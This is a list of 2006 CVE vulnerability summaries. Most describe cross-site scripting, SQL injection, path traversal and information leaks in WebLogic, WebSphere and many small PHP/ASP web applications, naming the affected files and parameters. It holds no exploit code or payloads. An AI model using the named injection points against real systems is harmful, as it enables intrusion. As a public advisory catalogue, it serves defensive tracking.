[CVE-2006-2473] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in ow.asp in OpenWiki 0.78 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this issue has been disputed by the vendor and a third party who is affiliated with the product. The vendor states "You cannot insert code in a wikipage or via URL parameters as they are all escaped before usage, so nothing can be compromised at other sites."
[CVE-2006-2472] Unspecified vulnerability in BEA WebLogic Server 9.1 and 9.0, 8.1 through SP5, 7.0 through SP6, and 6.1 through SP7 allows untrusted applications to obtain private server keys.
[CVE-2006-2471] Multiple vulnerabilities in BEA WebLogic Server 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7 leak sensitive information to remote attackers, including (1) DNS and IP addresses to address to T3 clients, (2) internal sensitive information using GetIORServlet, (3) certain "server details" in exceptions when invalid XML is provided, and (4) a stack trace in a SOAP fault.
[CVE-2006-2470] Unspecified vulnerability in the WebLogic Server Administration Console for BEA WebLogic Server 9.0 prevents the console from setting custom JDBC security policies correctly, which could allow attackers to bypass intended policies.
[CVE-2006-2469] The HTTP handlers in BEA WebLogic Server 9.0, 8.1 up to SP5, 7.0 up to SP6, and 6.1 up to SP7 store the username and password in cleartext in the WebLogic Server log when access to a web application or protected JWS fails, which allows attackers to gain privileges.
[CVE-2006-2468] The WebLogic Server Administration Console in BEA WebLogic Server 8.1 up to SP4 and 7.0 up to SP6 displays the domain name in the Console login form, which allows remote attackers to obtain sensitive information.
[CVE-2006-2467] BEA WebLogic Server 8.1 up to SP4, 7.0 up to SP6, and 6.1 up to SP7 displays the internal IP address of the WebLogic server in the WebLogic Server Administration Console, which allows remote authenticated administrators to determine the address.
[CVE-2006-2466] BEA WebLogic Server 8.1 up to SP4 and 7.0 up to SP6 allows remote attackers to obtain the source code of JSP pages during certain circumstances related to a "timing window" when a compilation error occurs, aka the "JSP showcode vulnerability."
[CVE-2006-2464] stopWebLogic.sh in BEA WebLogic Server 8.1 before Service Pack 4 and 7.0 before Service Pack 6 displays the administrator password to stdout when executed, which allows local users to obtain the password by viewing a local display.
[CVE-2006-2462] BEA WebLogic Server 8.1 before Service Pack 4 and 7.0 before Service Pack 6 may send sensitive data over non-secure channels when using JTA transactions, which allows remote attackers to read potentially sensitive network traffic.
[CVE-2006-2461] BEA WebLogic Server before 8.1 Service Pack 4 does not properly set the Quality of Service in certain circumstances, which prevents some transmissions from being encrypted via SSL, and allows remote attackers to more easily read potentially sensitive network traffic.
[CVE-2006-2438] Directory traversal vulnerability in the viewfile servlet in the documentation package (resin-doc) for Caucho Resin 3.0.17 and 3.0.18 allows remote attackers to read arbitrary files under other web roots via the contextpath parameter. NOTE: this issue can produce resultant path disclosure when the parameter is invalid.
[CVE-2006-2437] The viewfile servlet in the documentation package (resin-doc) for Caucho Resin 3.0.17 and 3.0.18 allows remote attackers to obtain the source code of files under the web root via the file parameter.
[CVE-2006-2436] WebSphere Application Server 5.0.2 (or any earlier cumulative fix) stores admin and LDAP passwords in plaintext in the FFDC logs when a login to WebSphere fails, which allows attackers to gain privileges.
[CVE-2006-2435] Unspecified vulnerability in IBM WebSphere Application Server 5.0.2 and earlier, and 5.1.1 and earlier, has unknown impact and attack vectors related to "Inserting certain script tags in urls [that] may allow unintended execution of scripts."
[CVE-2006-2434] Unspecified vulnerability in WebSphere 5.1.1 (or any earlier cumulative fix) Common Configuration Mode + CommonArchive and J2EE Models might allow attackers to obtain sensitive information via the trace.
[CVE-2006-2433] Unspecified vulnerability in IBM WebSphere Application Server 6.0.2, 6.0.2.1, 6.0.2.3, 6.0.2.5, and 6.0.2.7 has unknown impact and attack vectors related to the "administrative console".
[CVE-2006-2432] IBM WebSphere Application Server 5.0.2 (or any earlier cumulative fix) and 5.1.1 (or any earlier cumulative fix) allows EJB access on Solaris systems via a crafted LTPA token.
[CVE-2006-2431] Cross-site scripting (XSS) vulnerability in the 500 Internal Server Error page on the SOAP port (8880/tcp) in IBM WebSphere Application Server 5.0.2 and earlier, 5.1.x before 5.1.1.12, and 6.0.2 up to 6.0.2.7, allows remote attackers to inject arbitrary web script or HTML via the URI, which is contained in a FAULTACTOR element on this page. NOTE: some sources have reported the element as "faultfactor," but this is likely erroneous.
[CVE-2006-2430] IBM WebSphere Application Server 5.0.2 and earlier, 5.1.1 and earlier, and 6.0.2 up to 6.0.2.7 records user credentials in plaintext in addNode.log, which allows attackers to gain privileges.
[CVE-2006-2429] Unspecified vulnerability in IBM WebSphere Application Server 6.0.2, 6.0.2.1, 6.0.2.3, 6.0.2.5, and 6.0.2.7 has unknown impact and remote attack vectors related to "HTTP request handlers".
[CVE-2006-2425] Multiple cross-site scripting (XSS) vulnerabilities in PRV.php in PhpRemoteView, possibly 2003-10-23 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) f, (2) d, and (3) ref parameters, and the (4) "MAKE DIR" and (5) "Full file name" fields.
[CVE-2006-2423] Cross-site scripting (XSS) vulnerability in ftplogin/index.php in Confixx 3.1.2 allows remote attackers to inject arbitrary web script or HTML via the login parameter.
[CVE-2006-2419] Cross-site scripting (XSS) vulnerability in index.php in Directory Listing Script allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2006-2418] Cross-site scripting (XSS) vulnerabilities in certain versions of phpMyAdmin before 2.8.0.4 allow remote attackers to inject arbitrary web script or HTML via the db parameter in unknown scripts.
[CVE-2006-2417] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.0.x before 2.8.0.4 allows remote attackers to inject arbitrary web script or HTML via the theme parameter in unknown scripts. NOTE: the lang parameter is already covered by CVE-2006-2031.
[CVE-2006-2415] Multiple cross-site scripting (XSS) vulnerabilities in FlexChat 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username and (2) CFTOKEN parameter in (a) index.cfm and (3) CFTOKEN and (4) CFID parameter in (b) chat.cfm.
[CVE-2006-2397] Multiple cross-site scripting (XSS) vulnerabilities in GPhotos 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) rep parameter to (a) index.php or (b) diapo.php or (2) image parameter to (c) affich.php. NOTE: item 1a might be resultant from directory traversal.
[CVE-2006-2396] Cross-site scripting (XSS) vulnerability in phpODP 1.5h allows remote attackers to inject arbitrary web script via the browse parameter.
[CVE-2006-2394] Cross-site scripting (XSS) vulnerability in chat.php in PHP Live Helper allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter.
[CVE-2006-2390] Cross-site scripting (XSS) vulnerability in OZJournals 1.2 allows remote attackers to inject arbitrary web script or HTML via the vname parameter in the comments functionality.
[CVE-2006-2385] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption when it is saved as a multipart HTML (.mht) file.
[CVE-2006-2368] Cross-site scripting (XSS) vulnerability in index.php in Clansys (aka Clanpage System) 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-2367] Cross-site scripting (XSS) vulnerability in index.php in Clansys (aka Clanpage System) 1.0 and 1.1 allows remote attackers to inject arbitrary web script or HTML via the func parameter in a search function.
[CVE-2006-2365] Cross-site scripting (XSS) vulnerability in a_login.php in Vizra allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2006-2364] Cross-site scripting (XSS) vulnerability in the validation feature in Macromedia ColdFusion 5 and earlier allows remote attackers to inject arbitrary web script or HTML via a "_required" field when the associated normal field is missing or empty, which is not sanitized before being presented in an error message.
[CVE-2006-2363] SQL injection vulnerability in the weblinks option (weblinks.html.php) in Limbo CMS allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2006-2359] Cross-site scripting (XSS) vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2358] Multiple cross-site scripting (XSS) vulnerabilities in various scripts in Web-Labs CMS allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter and (2) unspecified fields related to e-mail alerts. NOTE: the provenance of this information is unknown.
[CVE-2006-2353] NmConsole/DeviceSelection.asp in Ipswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allows remote attackers to redirect users to other websites via the (1) sCancelURL and possibly (2) sRedirectUrl parameters.
[CVE-2006-2352] Multiple cross-site scripting (XSS) vulnerabilities in Ipswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allow remote attackers to inject arbitrary web script or HTML via unknown vectors in (1) NmConsole/Tools.asp and (2) NmConsole/DeviceSelection.asp. NOTE: the provenance of this information is unknown.
[CVE-2006-2351] Multiple cross-site scripting (XSS) vulnerabilities in Ipswitch WhatsUp Professional 2006 and WhatsUp Professional 2006 Premium allow remote attackers to inject arbitrary web script or HTML via the (1) sDeviceView or (2) nDeviceID parameter to (a) NmConsole/Navigation.asp or (3) sHostname parameter to (b) NmConsole/ToolResults.asp.
[CVE-2006-2348] Cross-site scripting (XSS) vulnerability in form_grupo.html in E-Business Designer (eBD) 3.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2347] E-Business Designer (eBD) 3.1.4 and earlier allows remote attackers to obtain the full path of the web server via "'" characters, and possibly other invalid values, in (1) the id parameter to form_grupo.html, or requests to the (2) archivos/ and (3) files/ directories. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2345] Cross-site scripting (XSS) vulnerability in inc/elementz.php in AliPAGER 1.5 allows remote attackers to inject arbitrary web script or HTML via the ubild parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2343] Cross-site scripting (XSS) vulnerability in Search.do in ManageEngine OpManager 6.0 allows remote attackers to inject arbitrary web script or HTML via the searchTerm parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2342] IBM WebSphere Application Server 6.0.2 before FixPack 3 allows remote attackers to bypass authentication for the Welcome Page via a request to the default context root.
[CVE-2006-2340] Cross-site scripting (XSS) vulnerability in PassMasterFlex and PassMasterFlexPlus (PassMasterFlex+) 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) username, (2) password, or (3) User-Agent HTTP header in the Hack Log.
[CVE-2006-2337] Directory traversal vulnerability in webcm in the D-Link DSL-G604T Wireless ADSL Router Modem allows remote attackers to read arbitrary files via an absolute path in the getpage parameter.
[CVE-2006-2332] Mozilla Firefox 1.5.0.3 allows remote attackers to cause a denial of service via a web page with a large number of IMG elements in which the SRC attribute is a mailto URI. NOTE: another researcher found that the web page caused a temporary browser slowdown instead of a crash.
[CVE-2006-2325] Cross-site scripting (XSS) vulnerability in index.php in OnlyScript.info Online Universal Payment System Script allows remote attackers to inject arbitrary web script or HTML via the read parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2321] Multiple cross-site scripting (XSS) vulnerabilities in Ideal Science Ideal BB 1.5.4a and earlier allow remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: due to lack of details from the researcher, it is not clear whether this overlaps CVE-2004-2207.
[CVE-2006-2317] Unspecified vulnerability in Ideal Science Ideal BB 1.5.4a and earlier allows remote attackers to read arbitrary files under the web root via unspecified attack vectors related to the OpenTextFile method in Scripting.FileSystemObject.
[CVE-2006-2315] ** DISPUTED ** PHP remote file inclusion vulnerability in session.inc.php in ISPConfig 2.2.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the go_info[server][classes_root] parameter. NOTE: the vendor has disputed this vulnerability, saying that session.inc.php is not under the web root in version 2.2, and register_globals is not enabled.
[CVE-2006-2311] Cross-site scripting (XSS) vulnerability in BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to inject arbitrary web script or HTML via the filename in a request to a (1) .cfm or (2) .cfml file, which reflects the result in the default error page.
[CVE-2006-2307] Cross-site scripting (XSS) vulnerability in Website Baker CMS before 2.6.4 allows remote attackers to inject arbitrary web script or HTML via a user display name.
[CVE-2006-2306] Cross-site scripting (XSS) vulnerability in moreinfo.asp in EPublisherPro allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2305] Multiple cross-site scripting (XSS) vulnerabilities in Jadu CMS allow remote attackers to inject arbitrary web script or HTML via the (1) forename, (2) surname, (3) reg_email, (4) email_conf, (5) company, (6) city, (7) postcode, or (8) telephone parameters to site/scripts/register.php. NOTE: the provenance of this information is unknown.
[CVE-2006-2303] Cross-Application Scripting (XAS) vulnerability in ICQ Client 5.04 build 2321 and earlier allows remote attackers to inject arbitrary web script from one application into another via a banner, which is processed in the My Computer zone using the Internet Explorer COM object.
[CVE-2006-2294] Cross-site scripting (XSS) vulnerability in Dynamic Galerie 1.0 allows remote attackers to inject arbitrary web script or HTML via the pfad parameter in (1) index.php and (2) galerie.php. NOTE: this issue might be resultant from directory traversal.
[CVE-2006-2291] Cross-site scripting (XSS) vulnerability in calendar_new.asp in IA-Calendar allows remote attackers to inject arbitrary web script or HTML via the TypeName1 parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2290] Multiple cross-site scripting (XSS) vulnerabilities in kommentar.php in 2005-Comments-Script allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) email, and (3) url parameters.
[CVE-2006-2287] Multiple cross-site scripting (XSS) vulnerabilities in Vision Source 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the fields in a user's profile.
[CVE-2006-2282] Cross-site scripting (XSS) vulnerability in X7 Chat 2.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the URL of an avatar, possibly related to the avatar parameter in register.php.
[CVE-2006-2280] Directory traversal vulnerability in website.php in openEngine 1.8 Beta 2 and earlier allows remote attackers to list arbitrary directories and read arbitrary files via a .. (dot dot) in the template parameter.
[CVE-2006-2276] bgpd in Quagga 0.98 and 0.99 before 20060504 allows local users to cause a denial of service (CPU consumption) via a certain sh ip bgp command entered in the telnet interface.
[CVE-2006-2269] Cross-site scripting (XSS) vulnerability in myWebland MyBloggie 2.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a BBCode img tag.
[CVE-2006-2268] SQL injection vulnerability in FlexCustomer 0.0.4 and earlier allows remote attackers to bypass authentication and execute arbitrary SQL commands via the admin and ordinary user interface, probably involving the (1) checkuser and (2) checkpass parameters to (a) admin/index.php, and (3) username and (4) password parameters to (b) index.php. NOTE: it was later reported that 0.0.6 is also affected.
[CVE-2006-2265] Cross-site scripting vulnerability in admin/main.asp in Ocean12 Calendar Manager Pro 1.00 allows remote attackers to inject arbitrary web script or HTML via the date parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2262] Cross-site scripting (XSS) vulnerability in index.php in singapore 0.9.7 allows remote attackers to inject arbitrary web script or HTML via the image parameter.
[CVE-2006-2260] Cross-site scripting (XSS) vulnerability in the project module (project.module) in Drupal 4.5 and 4.6 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-2258] Cross-site scripting (XSS) vulnerability in Logon.asp in MaxxSchedule 1.0 allows remote attackers to inject arbitrary web script or HTML via the Error parameter.
[CVE-2006-2257] Cross-site scripting (XSS) vulnerability in index.php in easyEvent 1.2 allows remote attackers to inject arbitrary web script or HTML via the curr_year parameter.
[CVE-2006-2252] Cross-site scripting vulnerability in submit.php in OpenFAQ 0.4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-2249] Multiple cross-site scripting (XSS) vulnerabilities in search.php in CuteNews 1.4.1 and earlier, and possibly 1.4.5, allow remote attackers to inject arbitrary web script or HTML via the (1) user, (2) story, or (3) title parameters.
[CVE-2006-2248] Xeneo Web Server 2.2.22.0 allows remote attackers to obtain the source code of script files via crafted requests containing dot, space, and slash characters in the file extension.
[CVE-2006-2247] WebCalendar 1.0.1 to 1.0.3 generates different error messages depending on whether or not a username is valid, which allows remote attackers to enumerate valid usernames.
[CVE-2006-2246] Cross-site scripting (XSS) vulnerability in UBlog 1.6 Access Edition allows remote attackers to inject arbitrary web script or HTML via text fields when adding a blog entry.
[CVE-2006-2244] Multiple SQL injection vulnerabilities in Web4Future News Portal allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) comentarii.php or (2) view.php.
[CVE-2006-2243] Multiple cross-site scripting (XSS) vulnerabilities in Web4Future News Portal allow remote attackers to inject arbitrary web script or HTML via the ID parameter to (1) comentarii.php or (2) view.php. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2240] Unspecified vulnerability in the (1) web cache or (2) web proxy in Fujitsu NetShelter/FW allows remote attackers to cause a denial of service (device unresponsiveness) via certain DNS packets, as demonstrated by the OUSPG PROTOS DNS test suite.
[CVE-2006-2234] Multiple cross-site scripting (XSS) vulnerabilities in TyroCMS beta 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) a javascript URI in an img BBCode tag, or a JavaScript event in a (2) url BBCode tag or (3) color BBCode tag.
[CVE-2006-2232] Cross-site scripting (XSS) vulnerability in Scriptsez Cute Guestbook 20060211 allows remote attackers to inject arbitrary web script or HTML via the Comments field when signing the guestbook.
[CVE-2006-2231] Multiple cross-site scripting (XSS) vulnerabilities in addguest.cgi in Big Webmaster Guestbook Script 1.02 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) mail, (2) site, (3) city, (4) state, (5) country, and possibly (6) name fields, which are viewed via viewguest.cgi.
[CVE-2006-2229] OpenVPN 2.0.7 and earlier, when configured to use the --management option with an IP that is not 127.0.0.1, uses a cleartext password for TCP sessions to the management interface, which might allow remote attackers to view sensitive information or cause a denial of service.
[CVE-2006-2228] Cross-site scripting (XSS) vulnerability in w-Agora (aka Web-Agora) 4.2.0 allows remote attackers to inject arbitrary web script or HTML via a post with a BBCode tag that contains a JavaScript event name followed by whitespace before the '=' (equals) character, which bypasses a restrictive regular expression that attempts to remove onmouseover and other events.
[CVE-2006-2227] Cross-site scripting (XSS) vulnerability in misc.php in PunBB 1.2.11 allows remote attackers to inject arbitrary web script or HTML via the req_message parameter, because the value of the redirect_url parameter is not sanitized.
[CVE-2006-2216] Open Bulletin Board (OpenBB) 1.0.8 allows remote attackers to obtain the full path of the web server via an invalid pforums parameter to (1) misc.php and (2) member.php.
[CVE-2006-2210] Cross-site scripting (XSS) vulnerability in index.php in 321soft PhP-Gallery 0.9 allows remote attackers to inject arbitrary web script or HTML via the path parameter. NOTE: this issue might be resultant from the directory traversal vulnerability.
[CVE-2006-2208] Multiple cross-site scripting (XSS) vulnerabilities in mynews.inc.php in MyNews 1.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) hash and (2) page parameters.
[CVE-2006-2195] Cross-site scripting (XSS) vulnerability in horde 3 (horde3) before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) templates/problem/problem.inc and (2) test.php.
[CVE-2006-2190] Cross-site scripting (XSS) vulnerability in ow-shared.pl in OpenWebMail (OWM) 2.51 and earlier allows remote attackers to inject arbitrary web script or HTML via the sessionid parameter in (1) openwebmail-send.pl, (2) openwebmail-advsearch.pl, (3) openwebmail-folder.pl, (4) openwebmail-prefs.pl, (5) openwebmail-abook.pl, (6) openwebmail-read.pl, (7) openwebmail-cal.pl, and (8) openwebmail-webdisk.pl. NOTE: the openwebmail-main.pl vector is already covered by CVE-2005-2863.
[CVE-2006-2188] Multiple cross-site scripting (XSS) vulnerabilities in CMScout 1.10 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the Body field of a private message (PM), (2) BBCode, or (3) a forum post.
[CVE-2006-2187] Multiple cross-site scripting (XSS) vulnerabilities in zenphoto 1.0.1 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) a parameter in i.php, and the (2) album and (3) image parameters in index.php.
[CVE-2006-2184] Cross-site scripting (XSS) vulnerability in search.php in PHPKB Knowledge Base allows remote attackers to inject arbitrary web script or HTML via the searchkeyword parameter. NOTE: the issue was originally disputed by the vendor, but on 20060519, the vendor notified CVE that "We have fixed all the mentioned issues and now the search section of PHPKB script is free from any XSS issues."
[CVE-2006-2181] Multiple cross-site scripting (XSS) vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cid parameter to dlisting.php or (2) preloadSlideShow parameter to showpic.php.
[CVE-2006-2178] Multiple cross-site scripting (XSS) vulnerabilities in CyberBuild allow remote attackers to inject arbitrary web script or HTML via the (1) SessionID parameter to login.asp, (2) ProductIndex parameter to browse0.htm, (3) rowcolor parameter to result.asp, or (4) heading parameter to result.asp. NOTE: vectors 1 and 2 might be resultant from SQL injection.
[CVE-2006-2177] Cross-site scripting (XSS) vulnerability in viewcat.php in geoBlog 1.0 allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-2176] Multiple cross-site scripting (XSS) vulnerabilities in links.php in PHP Linkliste 1.0b allow remote attackers to inject arbitrary web script or HTML via the (1) new_input, (2) new_url, or (3) new_name parameter.
[CVE-2006-2174] Multiple cross-site scripting (XSS) vulnerabilities in admin/server_day_stats.php in Virtual Hosting Control System (VHCS) allow remote attackers to inject arbitrary web script or HTML via the (1) day, (2) month, or (3) year parameter.
[CVE-2006-2173] Buffer overflow in FileZilla FTP Server 2.2.22 allows remote authenticated attackers to cause a denial of service and possibly execute arbitrary code via a long (1) PORT or (2) PASS followed by the MLSD command, or (3) the remote server interface, as demonstrated by the Infigo FTPStress Fuzzer.
[CVE-2006-2167] Cross-site scripting (XSS) vulnerability in SloughFlash SF-Users 1.0, possibly in register.php, allows remote attackers to inject arbitrary web script or HTML by setting the username field to contain JavaScript in the SRC attribute of an IMG element.
[CVE-2006-2166] Unspecified vulnerability in the HTTP management interface in Cisco Unity Express (CUE) 2.2(2) and earlier, when running on any CUE Advanced Integration Module (AIM) or Network Module (NM), allows remote authenticated attackers to reset the password for any user with an expired password.
[CVE-2006-2165] Multiple cross-site scripting (XSS) vulnerabilities in Avactis Shopping Cart 0.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) category_id parameter in (a) store_special_offers.php and (b) store.php and (2) prod_id parameter in (c) product_info.php. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2163] Cross-site scripting (XSS) vulnerability in index.php in Pinnacle Cart 3.33 and earlier allows remote attackers to inject arbitrary web script or HTML via the setbackurl parameter.
[CVE-2006-2160] Cross-site scripting (XSS) vulnerability in Russcom Network Loginphp (Russcom.Loginphp) allows remote attackers to inject arbitrary web script or HTML via the username field when registering.
[CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
[CVE-2006-2146] Multiple cross-site scripting (XSS) vulnerabilities in index.php in HB-NS 1.1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) poster_name, (2) poster_email, (3) poster_homepage, or (4) message parameter.
[CVE-2006-2143] Multiple cross-site scripting (XSS) vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via JavaScript events such as "onmouseover" in the (1) color, (2) size, or (3) url bbcode tags.
[CVE-2006-2141] Cross-site scripting (XSS) vulnerability in popup_image in Collaborative Portal Server (CPS) 3.4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the pos argument.
[CVE-2006-2140] Multiple cross-site scripting (XSS) vulnerabilities in OrbitHYIP 2.0 and earlier allow remote attackers to inject arbitrary web script via the (1) referral parameter to signup.php or (2) id parameter to members.php.
[CVE-2006-2138] Cross-site scripting (XSS) vulnerability in neomail.pl in NeoMail 1.29 allows remote attackers to inject arbitrary web script or HTML via the sessionid parameter.
[CVE-2006-2127] SQL injection vulnerability in weblog_posting.php in Blog Mod 0.2.x allows remote attackers to execute arbitrary SQL commands via the r parameter.
[CVE-2006-2124] Multiple cross-site scripting (XSS) vulnerabilities in SunShop 3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) prevaction, (2) previd, (3) prevstart, (4) itemid, (5) id, and (6) action parameters in index.php.
[CVE-2006-2123] Multiple SQL injection vulnerabilities in the report interface in Network Administration Visualized (NAV) before 3.0.1 allow remote attackers to execute arbitrary SQL commands via unknown vectors.
[CVE-2006-2117] Cross-site scripting (XSS) vulnerability in Thyme 1.3 allows remote attackers to inject arbitrary web script or HTML via the search page.
[CVE-2006-2115] Format string vulnerability in SWS web Server 0.1.7 allows remote attackers to execute arbitrary code via unspecified vectors that are not properly handled in a syslog function call.
[CVE-2006-2114] Buffer overflow in SWS web Server 0.1.7 allows remote attackers to execute arbitrary code via a long request.
[CVE-2006-2112] Fuji Xerox Printing Systems (FXPS) print engine, as used in products including (1) Dell 3000cn through 5110cn and (2) Fuji Xerox DocuPrint firmware before 20060628 and Network Option Card firmware before 5.13, allows remote attackers to use the FTP printing interface as a proxy ("FTP bounce") by using arbitrary PORT arguments to connect to systems for which access would be otherwise restricted.
[CVE-2006-2109] Cross-site scripting (XSS) vulnerability in the parse_query_str function in include/print.php in JSBoard 2.0.10 and 2.0.11, and possibly other versions before 2.0.12, allows remote attackers to inject arbitrary web script or HTML via parameters that are set as global variables within the program, as demonstrated using the table parameter to login.php.
[CVE-2006-2106] Cross-site scripting (XSS) vulnerability in Edgewall Software Trac 0.9.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors related to a "wiki macro."
[CVE-2006-2104] Multiple cross-site scripting (XSS) vulnerabilities in Kamgaing Email System (kmail) 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) d parameter to main.php, ordner parameter to (2) main.php, or (3) webdisk.php, (4) draft parameter to compose.php, or (5) m, or (6) y parameter to calendar.php.
[CVE-2006-2089] Multiple cross-site scripting (XSS) vulnerabilities in misc.php in MySmartBB 1.1.x allow remote attackers to inject arbitrary web script or HTML via the (1) id and (2) username parameters.
[CVE-2006-2088] Multiple cross-site scripting (XSS) vulnerabilities in Devsyn Open Bulletin Board (OpenBB) 1.0.6 allow remote attackers to inject arbitrary web script or HTML via (1) the FID parameter in board.php and (2) the TID parameter in read.php. NOTE: the SQL injection issues are already covered by CVE-2005-1612 (read.php) and CVE-2005-2566 (board.php).
[CVE-2006-2084] Multiple cross-site scripting (XSS) vulnerabilities in FarsiNews 2.5.3 Pro and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters in (a) index.php, and the (3) mod parameter in (b) admin.php.
[CVE-2006-2079] Cross-site scripting (XSS) vulnerability in portfolio.php in Verosky Media Instant Photo Gallery, possibly before 1.0.2, allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter.
[CVE-2006-2070] Cross-site scripting (XSS) vulnerability in member.php in DevBB 1.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the member parameter in a viewpro action.
[CVE-2006-2066] Multiple cross-site scripting (XSS) vulnerabilities in pm_popup.php in MKPortal 1.1 Rc1 and earlier, as used with vBulletin 3.5.4 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) u1, (2) m1, (3) m2, (4) m3, or (5) m4 parameters.
[CVE-2006-2063] Multiple cross-site scripting (XSS) vulnerabilities in Leadhound Full and LITE 2.1, and probably the Network Version "Full Version", allow remote attackers to inject arbitrary web script or HTML via the login parameter in (1) agent_affil.pl, (2) agent_help.pl, (3) agent_faq.pl, (4) agent_help_insert.pl, (5) sign_out.pl, (6) members.pl, (7) modify_agent_1.pl, (8) modify_agent_2.pl, (9) modify_agent.pl, (10) agent_links.pl, (11) agent_stats_pending_leads.pl, (12) agent_logoff.pl, (13) agent_rev_det.pl, (14) agent_subaffiliates.pl, (15) agent_stats_pending_leads.pl, (16) agent_transactions.pl, (17) agent_payment_history.pl, (18) agent_summary.pl, (19) agent_camp_all.pl, (20) agent_camp_new.pl, (21) agent_camp_notsub.pl, (22) agent_campaign.pl, (23) agent_camp_expired.pl, (24) agent_stats_det.pl, (25) agent_stats.pl, (26) agent_camp_det.pl, (27) agent_camp_sub.pl, (28) agent_affil_list.pl, and (29) agent_affil_code.pl.
[CVE-2006-2052] Cross-site scripting (XSS) vulnerability in Verosky Media Instant Photo Gallery allows remote attackers to inject arbitrary web script or HTML via the member parameter in a viewpro action in member.php. NOTE: the original report may be inaccurate, since the "viewpro" string does not appear in the source code for version 1.0.2 of the product.
[CVE-2006-2051] Multiple cross-site scripting (XSS) vulnerabilities in myadmin/index.php in NextAge Shopping Cart allow remote attackers to inject arbitrary web script or HTML via the (1) username and (2) password parameters.
[CVE-2006-2049] Cross-site scripting (XSS) vulnerability in dcboard.cgi in DCScripts DCForumLite 3.0 allows remote attackers to inject arbitrary web script or HTML via the az parameter.
[CVE-2006-2048] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Edwin van Wijk phpWebFTP 2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) port, (2) server, and (3) user parameters. NOTE: it is possible that the affected version is actually 3.2.
[CVE-2006-2043] na-img-4.0.34.bin for the IP3 Networks NetAccess NA75 allows local users to gain Unix shell access via "`" (backtick) characters in the appliance's command line interface (CLI).
[CVE-2006-2041] PhpWebGallery before 1.6.0RC1 allows remote attackers to obtain arbitrary pictures via a request to picture.php without specifying the cat parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-2037] Cross-site scripting (XSS) vulnerability in index.php in Thwboard 3.0 Beta 2.84 allows remote attackers to inject arbitrary web script or HTML via the navpath parameter.
[CVE-2006-2035] Websense, when configured to permit access to the dynamic content category, allows local users to bypass intended blocking of the Uncategorized category by appending a "/?" sequence to a URL.
[CVE-2006-2031] Cross-site scripting (XSS) vulnerability in index.php in phpMyAdmin 2.8.0.3, 2.8.0.2, 2.8.1-dev, and 2.9.0-dev allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2006-2030] The Allied Telesyn AT-9724TS switch allows remote attackers to cause a denial of service via a large amount of UDP data to the switch, which leads to unstable operation and possibly failure of the management interface or routing.
